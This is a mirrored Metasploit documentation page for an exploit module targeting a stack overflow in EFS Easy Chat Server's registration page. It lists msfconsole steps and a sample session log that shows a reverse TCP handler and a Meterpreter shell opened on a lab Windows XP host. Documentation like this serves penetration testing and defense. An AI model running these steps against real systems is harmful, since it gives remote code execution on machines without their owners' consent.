CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/http/easychatserver_seh.md
Views: 11789

Description

This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.

This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application

Vulnerable Application

Easy Chat Server Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.

This module has been tested successfully on

  • Easy Chat Server 3.1 on Windows XP En SP3

Installers:

EFS Easy Chat Server Installers

Verification Steps

  1. Start msfconsole

  2. Do: use exploits/windows/http/easychatserver_seh

  3. Do: set rhosts [IP]

  4. Do: exploit

  5. You should get your payload executed

Scenarios

marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200

meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easychatserver_seh) >